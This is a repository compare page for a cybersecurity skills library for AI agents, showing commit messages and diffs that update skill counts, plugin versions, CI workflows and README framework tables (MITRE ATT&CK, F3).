creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-26 11:44:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: creator/Anthropic-Cybersecurity-Skills:c60cb4aa7b06faca439e4335b4eb9727570072db
Branches Tags
creator/Anthropic-Cybersecurity-Skills:main
creator/Anthropic-Cybersecurity-Skills:v1.3.0 creator/Anthropic-Cybersecurity-Skills:v1.2.0 creator/Anthropic-Cybersecurity-Skills:v1.1.0 creator/Anthropic-Cybersecurity-Skills:v1.0.0
...
compare: creator/Anthropic-Cybersecurity-Skills:v1.3.0
Branches Tags
creator/Anthropic-Cybersecurity-Skills:main
creator/Anthropic-Cybersecurity-Skills:v1.3.0 creator/Anthropic-Cybersecurity-Skills:v1.2.0 creator/Anthropic-Cybersecurity-Skills:v1.1.0 creator/Anthropic-Cybersecurity-Skills:v1.0.0

34 Commits
c60cb4aa7b ... v1.3.0

Author SHA1 Message Date
mukul975 101ca0bd88 chore: auto-update index.json and skill count 2026-06-22 17:08:43 +00:00
mukul975 8cae0648ec Add 55 new skills across 3 new domains + 6 undercovered areas (762 -> 817) 
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):

- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
  prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
  invocation, guardrails, model/data poisoning, system-prompt leakage,
  embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
  malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
  Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
  shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
  Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration

Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
 2026-06-22 19:08:16 +02:00
mukul975 13a1c4afd9 chore: auto-update index.json and skill count 2026-06-22 11:17:20 +00:00
mukul975 51140175a3 Fix plugin version (1.0.0->1.2.0), sync skill count to 762, automate both 
- plugin.json was stuck at version 1.0.0 and count 753 — this is the file the
  installer reads, so installs showed 1.0 everywhere. Bumped to 1.2.0 / 762.
- Update skill count to 762 across README (badge + 6 mentions), marketplace.json,
  and plugin.json (754/753 -> 762 after merging PRs #70/#71/#81)
- update-index.yml: now auto-syncs the skill count into README.md,
  marketplace.json, and plugin.json on every skills/ change (no more manual drift)
- sync-marketplace-version.yml: release now bumps plugin.json too (not just
  marketplace.json) and pushes to main, so plugin version tracks the release tag
 2026-06-22 13:16:56 +02:00
mukul975 7eebca88aa chore: auto-update index.json 2026-06-20 14:44:31 +00:00
Mahipal 0a12335b45 Merge pull request #81 from DevRedious/add-foundry-smart-contract-security-skill 
Add skill: auditing-foundry-smart-contract-security
 2026-06-20 16:44:21 +02:00
mukul975 8f0f3f2b60 chore: auto-update index.json 2026-06-20 14:44:17 +00:00
Mahipal 1ea94446c4 Merge pull request #71 from andrewibrah/add-grc-skills 
Add 5 skills: GRC (800-30, RMF, CMMC, HIPAA, TPRM)
 2026-06-20 16:44:09 +02:00
mukul975 3f82a6f962 chore: auto-update index.json 2026-06-20 14:44:06 +00:00
Mahipal 70b3d74943 Merge pull request #70 from andrewibrah/add-deception-skills 
Add 2 skills: deception (MITRE Engage, cloud decoys)
 2026-06-20 16:43:58 +02:00
mukul975 da758bf053 chore: auto-update index.json 2026-06-20 14:43:55 +00:00
Mahipal 2ad9e67a38 Merge pull request #84 from shanujans/main 
fix: Defang malware example to prevent Windows Defender quarantine
 2026-06-20 16:43:45 +02:00
mukul975 7d7c6342eb Add MITRE F3 badge to README badge cluster and bump frameworks count to 6 2026-06-20 16:27:18 +02:00
mukul975 9f9217875f chore: auto-update index.json 2026-06-20 14:06:27 +00:00
mukul975 886658219f Add MITRE Fight Fraud Framework (F3 v1.1) mappings to fraud-relevant skills 
- Add mitre_f3 frontmatter block to 94 fraud-relevant skills (phishing,
  account takeover, banking malware, BEC, identity/KYC, payment/card fraud,
  money-mule/cash-out, ransomware extortion, DFIR, threat intel)
- Map each skill to F3 v1.1 tactics + precise technique IDs, including the
  two F3-specific tactics ATT&CK lacks: Positioning (FA0001) and
  Monetization (FA0002)
- All 123 F3 v1.1 technique IDs validated against the upstream STIX bundle
  (github.com/center-for-threat-informed-defense/fight-fraud-framework):
  0 invalid IDs, 0 invalid tactics, 0 name mismatches, no placeholder IDs
- mitre_f3 kept as a separate block from mitre_attack (F3 redefines several
  ATT&CK tactics for the fraud context)
- Add docs/mitre-f3-mapping.md schema reference
- Update README: F3 as the 6th framework, dedicated F3 section + badge
 2026-06-20 16:06:04 +02:00
Shanujan Suresh 1aa3664910 Fix: Defang malware example to prevent AV quarantine 2026-06-18 14:43:19 +05:30
DevRedious 25e0bc60e8 Add skill: auditing-foundry-smart-contract-security 
Pre-deployment security audit skill for Solidity contracts in Foundry projects.
Complements analyzing-ethereum-smart-contract-vulnerabilities (which it is based
on) with a dev-side, Foundry-first workflow and full key-hygiene coverage.

Layers four independent techniques:
- Static analysis: Slither (90+ detectors) + Aderyn (Cyfrin)
- Symbolic execution: Mythril (optional)
- Property-based testing: forge fuzz + invariant tests (handler pattern)
- Manual review checklist + secrets/keystore audit

Includes scripts/agent.py (orchestrator aggregating Slither/Aderyn/Mythril/forge
test + coverage + private-key scan into a JSON report with a PASS/FAIL deploy
gate) and three references (tool cheat-sheets, SWC vulnerability checklist,
secure deployment & key hygiene with cast keystore / multisig).

Passes tools/validate-skill.py. Slither, Aderyn, forge test/coverage parsing and
the gate logic were verified end-to-end against a reentrancy-vulnerable contract.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
 2026-06-16 15:52:33 +02:00
andrewibrah e8832748d3 Add 5 skills: GRC (800-30, RMF, CMMC, HIPAA, TPRM) 
- conducting-cyber-risk-assessment-with-nist-800-30
- executing-nist-rmf-authorization-to-operate
- achieving-cmmc-level-2-compliance
- implementing-hipaa-security-rule-safeguards
- managing-third-party-vendor-risk

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
 2026-06-04 09:57:31 -04:00
andrewibrah fd0f0e702a Add 2 skills: deception (MITRE Engage, cloud decoys) 
- designing-adversary-engagement-with-mitre-engage
- deploying-cloud-deception-with-decoy-resources

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
 2026-06-04 09:56:25 -04:00
mukul975 04450304b1 chore: auto-update index.json 2026-06-01 10:15:47 +00:00
mukul975 cb8d79e068 Map all 754 skills to MITRE ATT&CK v19.1 
- Add validated mitre_attack frontmatter to all 754 skills (286 distinct
  techniques), verified against MITRE ATT&CK v19.1 via the official
  mitreattack-python library: 0 revoked, deprecated, or invalid IDs
- Curate precise per-skill technique IDs for forensics, malware-analysis,
  threat-intel, and red-team skills (e.g. DCSync -> T1003.006,
  Kerberoasting -> T1558.003, Pass-the-Ticket -> T1550.003)
- Reconcile v19.1 tactic restructuring: Defense Evasion split into
  Stealth (TA0005) and Defense Impairment (TA0112); revoked T1562.*
  family and T1070.001/.002 remapped to active equivalents (T1685.*)
- Normalize word-split tags across 35 skills (remove filename-derived
  stopword tags, add semantic cybersecurity tags)
- Add api-reference.md for 3 skills that were missing it
- Update README ATT&CK section with accurate v19.1 tactic distribution
 2026-06-01 12:13:29 +02:00
mukul975 9a588e643e chore: auto-update index.json 2026-05-30 09:32:08 +00:00
Mahipal 868465b4e4 Merge pull request #58 from Bortlesboat/fix/objection-skill-description 
Fix description YAML for Objection iOS skill
 2026-05-30 11:32:00 +02:00
Andrew Barnes 2338e0371c Fix Objection skill description frontmatter 
Normalize YAML description so tools can reliably parse it.
 2026-05-25 09:04:36 -04:00
Mahipal 0f429d0f96 Update README.md 2026-05-13 11:07:15 +02:00
Mahipal 15b63716a4 Update README.md 2026-05-13 10:56:27 +02:00
mukul975 77d5d9d686 chore: auto-update index.json 2026-04-26 12:03:37 +00:00
Mahipal 812db448e0 Merge PR #44: Normalize tags in 3 skills 2026-04-26 14:03:28 +02:00
Mahipal fcc73ea471 Merge PR #28: Add bulk skill metadata validation script 2026-04-26 14:03:24 +02:00
claude[bot] fbc47b7ac2 fix: replace word-split tags with domain-specific cybersecurity tags 
Three SKILL.md files had tags that were simply words split from the
skill name (e.g., "analyzing", "block", "with", "logs") rather than
meaningful discovery keywords. Replace with domain-specific terms that
agents and search tools can actually use for routing.

- analyzing-powershell-script-block-logging: [powershell, script-block-logging, event-id-4104, obfuscation-detection, windows-forensics, endpoint-security]
- analyzing-azure-activity-logs-for-threats: [azure, cloud-security, azure-monitor, kql, threat-hunting, activity-logs]
- analyzing-memory-forensics-with-lime-and-volatility: [memory-forensics, linux-forensics, lime, volatility, incident-response, kernel-modules]

Co-Authored-By: Claude Code <noreply@anthropic.com>
 2026-04-21 00:35:35 +00:00
Mahipal 888bbe4c6e Delete star.yml 2026-04-18 02:09:43 +02:00
Julio César Suástegui efc9598525 fix(validator): address all remaining review feedback from @mukul975 
Three issues fixed:

1. Description list check — added elif isinstance(desc, list) branch that
   emits 'Description must be a string value, not a list'. Previously the
   block was silently skipped when YAML returned a list, causing the skill
   to pass without validating the description field.

2. tools/README.md synced — updated description constraint from '20-500
   characters' to 'at least 50 characters (no upper limit)' to match the
   current code (DESCRIPTION_MIN_CHARS=50, no max enforced).

3. --all with wrong CWD now exits 1 — if glob returns no skill dirs,
   the script prints an error and exits with code 1 instead of reporting
   'Total: 0 Passed: 0 Failed: 0' and exiting 0, which would cause CI to
   silently pass while validating nothing.

All 754 skills continue to pass (0 regressions).
 2026-04-04 05:34:31 -06:00
Julio César Suástegui 31f745385b fix(validator): address all review feedback from @mukul975 
Required changes:
- Error handling: IOError and UnicodeDecodeError already wrapped in
  try/except from previous commit — still present and correct.
- ALLOWED_SUBDOMAINS: synced with actual repo usage (audited all 754
  skills). identity-access-management (34 skills) added; identity-security
  was the placeholder in its place.

New in this commit:
1. Description minimum: raised from 20 → 50 chars to align with other
   repo tooling as requested.
2. Folded scalar support: parse_frontmatter now handles YAML `>-` and `>`
   folded scalars, preventing incorrect parse of multi-line descriptions.
   Added a comment documenting the one remaining edge case (value-less key
   followed by non-list content — treated as no-value, acceptable for
   well-formed SKILL.md files).
3. Canonical subdomain warnings: alias subdomain values (e.g.
   security-operations vs soc-operations) now print a WARN line pointing
   to the canonical form, but are non-blocking. A _SUBDOMAIN_ALIASES dict
   documents canonical/alias pairs explicitly.
4. Description upper limit: removed hard cap — folded scalars legitimately
   produce long strings in existing skills.
5. PR description: removed false mention of type hints (there are none
   in this file).

Validator now passes 754/754 skills in the repo with 0 errors.
 2026-04-03 09:51:27 -06:00
Julio César Suástegui b53f3d4991 fix: add error handling for IOError/UnicodeDecodeError + sync ALLOWED_SUBDOMAINS 
- Wrap open() call in try/except for IOError and UnicodeDecodeError
  to report clean errors instead of crashing on encoding issues
- Add all subdomains actually used by existing skills in the repo:
  identity-access-management (33 skills), security-operations (28),
  identity-and-access-management, zero-trust, ot-security, purple-team,
  red-team, ai-security, social-engineering-defense, and others
- Remove identity-security as the canonical form is identity-access-management
 2026-04-03 09:49:04 -06:00
1081 changed files with 53025 additions and 2542 deletions
Expand all files Collapse all files
.claude-plugin/marketplace.json
+2 -2
View File
@@ -5,14 +5,14 @@
"email": "mukuljangra5@gmail.com"
},
"metadata": {
"description": "754 cybersecurity skills for AI agents mapped to 5 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, and NIST AI RMF.",
"description": "817 cybersecurity skills for AI agents mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF, and the MITRE Fight Fraud Framework (F3).",
"version": "1.2.0"
},
"plugins": [
{
"name": "cybersecurity-skills",
"source": "./",
"description": "754 cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more. Mapped to 5 frameworks.",
"description": "817 cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more. Mapped to 6 frameworks.",
"version": "1.2.0",
"author": {
"name": "mukul975"
.claude-plugin/plugin.json
+2 -2
View File
@@ -1,5 +1,5 @@
{
"name": "cybersecurity-skills",
"description": "753 cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more.",
"version": "1.0.0"
"description": "817 cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more.",
"version": "1.2.0"
}
.github/workflows/star.yml
-188
View File
@@ -1,188 +0,0 @@
# .github/workflows/star-milestones.yml
name: ⭐ Star Milestone Tracker
on:
schedule:
- cron: '0 * * * *'
workflow_dispatch:
inputs:
force_check:
description: 'Force milestone check regardless of current state'
required: false
default: 'false'
permissions:
actions: write
concurrency:
group: star-milestone-check
cancel-in-progress: false
env:
REPO: mukul975/Anthropic-Cybersecurity-Skills
MILESTONE_INTERVAL: 500
VAR_NAME: LAST_STAR_MILESTONE
jobs:
check-stars:
runs-on: ubuntu-latest
timeout-minutes: 5
steps:
- name: Fetch star count
id: stars
run: |
RESPONSE=$(curl -s -o /tmp/repo.json -w "%{http_code}" \
-H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
-H "Accept: application/vnd.github+json" \
"https://api.github.com/repos/$REPO")
if [ "$RESPONSE" != "200" ]; then
echo "❌ GitHub API error: $RESPONSE"
exit 1
fi
STARS=$(jq .stargazers_count /tmp/repo.json)
FORKS=$(jq .forks_count /tmp/repo.json)
echo "stars=$STARS" >> $GITHUB_OUTPUT
echo "forks=$FORKS" >> $GITHUB_OUTPUT
echo "✅ Stars: $STARS | Forks: $FORKS"
- name: Fetch last milestone
id: last
run: |
RESPONSE=$(curl -s -o /tmp/var.json -w "%{http_code}" \
-H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
-H "Accept: application/vnd.github+json" \
"https://api.github.com/repos/$REPO/actions/variables/$VAR_NAME")
echo "status=$RESPONSE" >> $GITHUB_OUTPUT
if [ "$RESPONSE" = "200" ]; then
LAST=$(jq -r '.value' /tmp/var.json)
else
LAST="INIT"
fi
echo "value=$LAST" >> $GITHUB_OUTPUT
echo "📌 Last milestone: $LAST"
- name: Evaluate milestone
id: milestone
run: |
STARS=${{ steps.stars.outputs.stars }}
LAST="${{ steps.last.outputs.value }}"
CURRENT=$(( (STARS / MILESTONE_INTERVAL) * MILESTONE_INTERVAL ))
NEXT=$(( CURRENT + MILESTONE_INTERVAL ))
REMAINING=$(( NEXT - STARS ))
PROGRESS=$(( (STARS % MILESTONE_INTERVAL) * 100 / MILESTONE_INTERVAL ))
echo "current=$CURRENT" >> $GITHUB_OUTPUT
echo "next=$NEXT" >> $GITHUB_OUTPUT
echo "remaining=$REMAINING" >> $GITHUB_OUTPUT
echo "progress=$PROGRESS" >> $GITHUB_OUTPUT
if [ "$LAST" = "INIT" ]; then
echo "notify=false" >> $GITHUB_OUTPUT
echo "init=true" >> $GITHUB_OUTPUT
echo "🚀 First run — initializing baseline at $CURRENT, no notification sent"
elif [ "$CURRENT" -gt "$LAST" ] && [ "$CURRENT" -gt 0 ]; then
echo "notify=true" >> $GITHUB_OUTPUT
echo "init=false" >> $GITHUB_OUTPUT
echo "🎉 NEW MILESTONE: $CURRENT (was $LAST)"
else
echo "notify=false" >> $GITHUB_OUTPUT
echo "init=false" >> $GITHUB_OUTPUT
echo "💤 No new milestone. Next: $NEXT in $REMAINING stars ($PROGRESS% there)"
fi
- name: Send Slack notification
if: steps.milestone.outputs.notify == 'true'
run: |
STARS=${{ steps.stars.outputs.stars }}
FORKS=${{ steps.stars.outputs.forks }}
MILESTONE=${{ steps.milestone.outputs.current }}
NEXT=${{ steps.milestone.outputs.next }}
REMAINING=${{ steps.milestone.outputs.remaining }}
PROGRESS=${{ steps.milestone.outputs.progress }}
if [ "$MILESTONE" -ge 10000 ]; then BADGE="🏆"
elif [ "$MILESTONE" -ge 5000 ]; then BADGE="🔥"
elif [ "$MILESTONE" -ge 2500 ]; then BADGE="🚀"
elif [ "$MILESTONE" -ge 1000 ]; then BADGE="💫"
else BADGE="⭐"
fi
curl -s -X POST "${{ secrets.SLACK_WEBHOOK_URL }}" \
-H 'Content-type: application/json' \
-d "{
\"text\": \"$BADGE *$MILESTONE Star Milestone Reached!*\",
\"attachments\": [{
\"color\": \"#FFD700\",
\"blocks\": [
{
\"type\": \"section\",
\"fields\": [
{\"type\": \"mrkdwn\", \"text\": \"*🎯 Milestone*\n$MILESTONE stars\"},
{\"type\": \"mrkdwn\", \"text\": \"*⭐ Total Stars*\n$STARS\"},
{\"type\": \"mrkdwn\", \"text\": \"*🍴 Forks*\n$FORKS\"},
{\"type\": \"mrkdwn\", \"text\": \"*🔜 Next Milestone*\n$NEXT ($REMAINING to go — $PROGRESS% there)\"}
]
},
{
\"type\": \"actions\",
\"elements\": [{
\"type\": \"button\",
\"text\": {\"type\": \"plain_text\", \"text\": \"View Repo ↗\"},
\"url\": \"https://github.com/$REPO\",
\"style\": \"primary\"
}]
}
]
}]
}"
echo "✅ Slack notified"
- name: Save milestone
if: steps.milestone.outputs.notify == 'true' || steps.milestone.outputs.init == 'true'
run: |
MILESTONE=${{ steps.milestone.outputs.current }}
STATUS=${{ steps.last.outputs.status }}
if [ "$STATUS" = "200" ]; then
METHOD="PATCH"
URL="https://api.github.com/repos/$REPO/actions/variables/$VAR_NAME"
else
METHOD="POST"
URL="https://api.github.com/repos/$REPO/actions/variables"
fi
HTTP=$(curl -s -o /dev/null -w "%{http_code}" \
-X "$METHOD" \
-H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
-H "Accept: application/vnd.github+json" \
-H "Content-type: application/json" \
"$URL" \
-d "{\"name\":\"$VAR_NAME\",\"value\":\"$MILESTONE\"}")
if [ "$HTTP" = "200" ] || [ "$HTTP" = "201" ] || [ "$HTTP" = "204" ]; then
echo "✅ Saved $VAR_NAME = $MILESTONE"
else
echo "❌ Failed to save variable (HTTP $HTTP)"
exit 1
fi
- name: Summary
run: |
echo "## ⭐ Star Tracker Run" >> $GITHUB_STEP_SUMMARY
echo "| Field | Value |" >> $GITHUB_STEP_SUMMARY
echo "|---|---|" >> $GITHUB_STEP_SUMMARY
echo "| Current Stars | ${{ steps.stars.outputs.stars }} |" >> $GITHUB_STEP_SUMMARY
echo "| Current Forks | ${{ steps.stars.outputs.forks }} |" >> $GITHUB_STEP_SUMMARY
echo "| Last Milestone | ${{ steps.last.outputs.value }} |" >> $GITHUB_STEP_SUMMARY
echo "| Next Milestone | ${{ steps.milestone.outputs.next }} |" >> $GITHUB_STEP_SUMMARY
echo "| Stars to Next | ${{ steps.milestone.outputs.remaining }} |" >> $GITHUB_STEP_SUMMARY
echo "| Progress | ${{ steps.milestone.outputs.progress }}% |" >> $GITHUB_STEP_SUMMARY
echo "| Notified | ${{ steps.milestone.outputs.notify }} |" >> $GITHUB_STEP_SUMMARY
.github/workflows/sync-marketplace-version.yml
+9 -5
View File
@@ -14,6 +14,8 @@ jobs:
- uses: actions/checkout@v4
with:
token: ${{ secrets.GITHUB_TOKEN }}
ref: main
fetch-depth: 0
- name: Extract version from tag
id: version
@@ -22,18 +24,20 @@ jobs:
echo "version=$VERSION" >> $GITHUB_OUTPUT
echo "tag=$GITHUB_REF_NAME" >> $GITHUB_OUTPUT
- name: Update marketplace.json version
- name: Update marketplace.json and plugin.json version
env:
VERSION: ${{ steps.version.outputs.version }}
run: |
jq --arg v "$VERSION" '.metadata.version = $v | .plugins[].version = $v' .claude-plugin/marketplace.json > tmp.json
mv tmp.json .claude-plugin/marketplace.json
echo "Updated marketplace.json to version $VERSION"
jq --arg v "$VERSION" '.version = $v' .claude-plugin/plugin.json > tmp.json
mv tmp.json .claude-plugin/plugin.json
echo "Updated marketplace.json and plugin.json to version $VERSION"
- name: Commit and push
run: |
git config user.name "mukul975"
git config user.email "mukuljangra5@gmail.com"
git add .claude-plugin/marketplace.json
git diff --staged --quiet || git commit -m "chore: bump marketplace version to ${{ steps.version.outputs.tag }}"
git push
git add .claude-plugin/marketplace.json .claude-plugin/plugin.json
git diff --staged --quiet || git commit -m "chore: bump plugin version to ${{ steps.version.outputs.tag }}"
git push origin HEAD:main
.github/workflows/update-index.yml
+45 -3
View File
@@ -61,10 +61,52 @@ jobs:
print(f"Updated index.json: {len(skills)} skills")
EOF
- name: Commit updated index
- name: Sync skill count into README and marketplace
run: |
python3 << 'EOF'
import os, re, json
# Authoritative count: directories under skills/ that contain a SKILL.md
# and are not .bak backups (matches index.json generation above).
count = 0
for name in os.listdir("skills"):
if name.endswith(".bak"):
continue
if os.path.isfile(os.path.join("skills", name, "SKILL.md")):
count += 1
print(f"Authoritative skill count: {count}")
# README.md — replace the skills badge and every "<NNN> ... skills" phrase.
with open("README.md", encoding="utf-8") as f:
readme = f.read()
readme = re.sub(r"(badge/skills-)\d+", rf"\g<1>{count}", readme)
# "754 production-grade", "754 structured", "754 skills", "all 754 skills",
# "Scans 754 skill", "contains **754 skills**", BibTeX "{754 structured"
readme = re.sub(r"\b\d+(?=\s+production-grade cybersecurity skills)", str(count), readme)
readme = re.sub(r"\b\d+(?=\s+structured cybersecurity skills)", str(count), readme)
readme = re.sub(r"(all\s+)\d+(?=\s+skills)", rf"\g<1>{count}", readme)
readme = re.sub(r"(Scans\s+)\d+(?=\s+skill\b)", rf"\g<1>{count}", readme)
readme = re.sub(r"(contains\s+\*\*)\d+(?=\s+skills\*\*)", rf"\g<1>{count}", readme)
readme = re.sub(r"(\{)\d+(?=\s+structured cybersecurity skills)", rf"\g<1>{count}", readme)
with open("README.md", "w", encoding="utf-8") as f:
f.write(readme)
# marketplace.json + plugin.json — patch "<NNN> cybersecurity skills" in descriptions.
for path in (".claude-plugin/marketplace.json", ".claude-plugin/plugin.json"):
with open(path, encoding="utf-8") as f:
data = f.read()
data = re.sub(r"\b\d+(?=\s+cybersecurity skills)", str(count), data)
json.loads(data) # fail loudly if the regex broke JSON
with open(path, "w", encoding="utf-8") as f:
f.write(data)
print("Synced skill count into README.md, marketplace.json, plugin.json")
EOF
- name: Commit updated index and skill count
run: |
git config user.name "mukul975"
git config user.email "mukuljangra5@gmail.com"
git add index.json
git diff --staged --quiet || git commit -m "chore: auto-update index.json"
git add index.json README.md .claude-plugin/marketplace.json .claude-plugin/plugin.json
git diff --staged --quiet || git commit -m "chore: auto-update index.json and skill count"
git push
README.md
+95 -38
View File
@@ -8,10 +8,12 @@
### The largest open-source cybersecurity skills library for AI agents
[![GARS-2026 Survey](https://img.shields.io/badge/GARS--2026-Take%20the%20Survey-E8B84B?style=for-the-badge&logo=googleforms&logoColor=black)](https://mahipal.engineer/survey?utm_source=github_badge&utm_medium=readme&utm_campaign=gars2026)
[![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg?style=flat-square)](LICENSE)
[![Skills](https://img.shields.io/badge/skills-754-brightgreen?style=flat-square)](#whats-inside--26-security-domains)
[![Frameworks](https://img.shields.io/badge/frameworks-5-orange?style=flat-square)](#five-frameworks-one-skill-library)
[![Domains](https://img.shields.io/badge/domains-26-9cf?style=flat-square)](#whats-inside--26-security-domains)
[![Skills](https://img.shields.io/badge/skills-817-brightgreen?style=flat-square)](#whats-inside--29-security-domains)
[![Frameworks](https://img.shields.io/badge/frameworks-6-orange?style=flat-square)](#six-frameworks-one-skill-library)
[![MITRE F3](https://img.shields.io/badge/MITRE-F3_v1.1-blue?style=flat-square)](https://ctid.mitre.org/fraud/)
[![Domains](https://img.shields.io/badge/domains-29-9cf?style=flat-square)](#whats-inside--29-security-domains)
[![Platforms](https://img.shields.io/badge/platforms-26%2B-blueviolet?style=flat-square)](#compatible-platforms)
[![GitHub stars](https://img.shields.io/github/stars/mukul975/Anthropic-Cybersecurity-Skills?style=flat-square)](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/stargazers)
[![GitHub forks](https://img.shields.io/github/forks/mukul975/Anthropic-Cybersecurity-Skills?style=flat-square)](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/network/members)
@@ -22,9 +24,9 @@
[![Hermes Agent](https://img.shields.io/badge/Hermes_Agent-compatible-blueviolet?style=flat)](https://github.com/NousResearch/hermes-agent)
**754 production-grade cybersecurity skills · 26 security domains · 5 framework mappings · 26+ AI platforms**
**817 production-grade cybersecurity skills · 29 security domains · 6 framework mappings · 26+ AI platforms**
[Get Started](#quick-start) · [What's Inside](#whats-inside--26-security-domains) · [Frameworks](#five-frameworks-one-skill-library) · [Platforms](#compatible-platforms) · [Contributing](#contributing)
[Get Started](#quick-start) · [What's Inside](#whats-inside--29-security-domains) · [Frameworks](#five-frameworks-one-skill-library) · [Platforms](#compatible-platforms) · [Contributing](#contributing)
</div>
@@ -36,25 +38,61 @@
A junior analyst knows which Volatility3 plugin to run on a suspicious memory dump, which Sigma rules catch Kerberoasting, and how to scope a cloud breach across three providers. **Your AI agent doesn't — unless you give it these skills.**
This repo contains **754 structured cybersecurity skills** spanning **26 security domains**, each following the [agentskills.io](https://agentskills.io) open standard. Every skill is mapped to **five industry frameworks** — MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, MITRE D3FEND, and NIST AI RMF — making this the only open-source skills library with unified cross-framework coverage. Clone it, point your agent at it, and your next security investigation gets expert-level guidance in seconds.
This repo contains **817 structured cybersecurity skills** spanning **29 security domains**, each following the [agentskills.io](https://agentskills.io) open standard. Every skill is mapped to **six industry frameworks** — MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, MITRE D3FEND, NIST AI RMF, and the MITRE Fight Fraud Framework (F3) — making this the only open-source skills library with unified cross-framework coverage. Clone it, point your agent at it, and your next security investigation gets expert-level guidance in seconds.
## Five frameworks, one skill library
## Six frameworks, one skill library
No other open-source skills library maps every skill to all five frameworks. One skill, five compliance checkboxes.
No other open-source skills library maps every skill to all of these frameworks. One skill, six compliance checkboxes.
| Framework | Version | Scope in this repo | What it maps |
|---|---|---|---|
| [MITRE ATT&CK](https://attack.mitre.org) | v18 | 14 tactics · 200+ techniques | Adversary behaviors and TTPs |
| [MITRE ATT&CK](https://attack.mitre.org) | v19.1 | 15 tactics · 286 techniques | Adversary behaviors and TTPs |
| [NIST CSF 2.0](https://www.nist.gov/cyberframework) | 2.0 | 6 functions · 22 categories | Organizational security posture |
| [MITRE ATLAS](https://atlas.mitre.org) | v5.4 | 16 tactics · 84 techniques | AI/ML adversarial threats |
| [MITRE D3FEND](https://d3fend.mitre.org) | v1.3 | 7 categories · 267 techniques | Defensive countermeasures |
| [NIST AI RMF](https://airc.nist.gov/AI_RMF) | 1.0 | 4 functions · 72 subcategories | AI risk management |
| [MITRE F3 (Fight Fraud Framework)](https://ctid.mitre.org/fraud/) | v1.1 (2026-04-09) | 8 tactics · 123 techniques · 94 fraud-relevant skills | Cyber-enabled financial fraud TTPs |
**Example — a single skill maps across all five:**
**Example — a single skill maps across all six:**
| Skill | ATT&CK | NIST CSF | ATLAS | D3FEND | AI RMF |
|---|---|---|---|---|---|
| `analyzing-network-traffic-of-malware` | T1071 | DE.CM | AML.T0047 | D3-NTA | MEASURE-2.6 |
| Skill | ATT&CK | NIST CSF | ATLAS | D3FEND | AI RMF | F3 |
|---|---|---|---|---|---|---|
| `analyzing-network-traffic-of-malware` | T1071 | DE.CM | AML.T0047 | D3-NTA | MEASURE-2.6 | — |
| `detecting-business-email-compromise` | T1566 | DE.AE | — | — | — | F1005.006 · monetization |
### 🆕 MITRE Fight Fraud Framework (F3) — 94 fraud-relevant skills
[![MITRE F3](https://img.shields.io/badge/MITRE-F3_v1.1-blue?style=flat-square)](https://ctid.mitre.org/fraud/)
The **[MITRE Fight Fraud Framework (F3)](https://ctid.mitre.org/fraud/)** was released **April 9, 2026** by MITRE's Center for Threat-Informed Defense (CTID), co-developed with JPMorganChase, Citigroup, Lloyds Banking Group, Standard Chartered, CrowdStrike, Verizon Business, FS-ISAC, and others. It is an ATT&CK-compatible TTP catalog for **cyber-enabled financial fraud** — filling the gap ATT&CK leaves after initial compromise.
F3 v1.1 adds **two fraud-specific tactics** that ATT&CK does not enumerate:
- **Positioning** (`FA0001`) — actions taken after access to collect/manipulate data and prepare the fraud (synthetic-identity seeding, account warming, beneficiary setup, SIM-swap pre-positioning, banking-session hijack).
- **Monetization** (`FA0002`) — converting stolen assets into usable funds (money-mule layering, APP fraud, crypto off-ramping, card cash-out, refund/chargeback abuse).
Fraud-specific techniques use `F1XXX` IDs (e.g. `F1005.003` Add Beneficiary, `F1025.003` Wire Transfer, `F1007` Adversary-in-the-Browser); reused ATT&CK techniques keep their `T1XXX` IDs. Mappings live in each skill's `mitre_f3:` frontmatter block — all 123 F3 v1.1 technique IDs were verified against the upstream STIX bundle. See [`docs/mitre-f3-mapping.md`](docs/mitre-f3-mapping.md) for the schema.
### MITRE ATT&CK v19.1 — 754/754 skills mapped
